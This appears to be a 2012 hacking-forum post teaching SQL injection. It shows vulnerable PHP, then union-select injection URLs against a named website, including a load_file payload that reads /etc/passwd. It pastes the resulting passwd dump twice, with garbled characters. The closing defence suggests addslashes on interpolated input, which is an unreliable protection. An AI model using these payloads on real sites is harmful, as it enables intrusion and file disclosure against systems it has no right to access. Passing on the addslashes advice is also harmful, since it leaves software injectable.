Post: SQL Injection 2 Get Server Files
Options
05-06-2012, 01:43 AM
#1
KingcreekS
NOTHING IS IMPOSSIBL
<?php
$id = $_GET['id'];
$peticion = mysql_query( "SELECT * FROM usuarios WHERE id = '$id'");
?>
here we have the God Damn Vulnerable Code haha now... where is the error...
in the GET we haven't filter anything... Sql Injection...
here is the web:
https://www.webvulnerable.pe/profile.php?id=%27
now and Injection, simple injection...
https://www.webvulnerable.pe/profile.php?id=11+union+all+select+1,2,3,4,5--
so...now... lets inject... with the function load_file
https://www.webvulnerable.pe/profile.php?id=11+union+all+select+1,2,null,load_file('etc/passwd'
,5--
Magic...
Originally posted by another user
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0
perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin distcache:x:94:94
istcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32
ortmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin luci:x:100:101::/var/lib/luci:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin ricci:x:101:102:ricci daemon user:/var/lib/ricci:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin avahi-autoipd:x:102:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin hpsmh:x:103:500::/opt/hp/hpsmh:/sbin/nologin Administrador:x:500:501::/home/Administrador:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
perator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin distcache:x:94:94istcache:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin rpc:x:32:32ortmapper RPC user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin piranha:x:60:60::/etc/sysconfig/ha:/sbin/nologin sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin luci:x:100:101::/var/lib/luci:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin ricci:x:101:102:ricci daemon user:/var/lib/ricci:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin avahi-autoipd:x:102:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin hpsmh:x:103:500::/opt/hp/hpsmh:/sbin/nologin Administrador:x:500:501::/home/Administrador:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
hahhaha yeah... now.. we've got the passwd, but this is an example because if not... then you got to make some path trasversal to get the passwd file...
How can we protect us?
<?php
$id = (int)$_GET['id'];
$peticion = mysql_query( "SELECT columna FROM usuarios WHERE id = '$id'");
?>
or
<?php
$id = addslashes($_GET['id']);
$peticion = mysql_query( "SELECT * FROM usuarios WHERE id = '$id'");
?>
Thanks & Regards
Bloodfocus
The following user thanked KingcreekS for this useful post:
05-06-2012, 04:10 PM
#2
KingcreekS
NOTHING IS IMPOSSIBL
Copyright © 2026, NextGenUpdate.
All Rights Reserved.
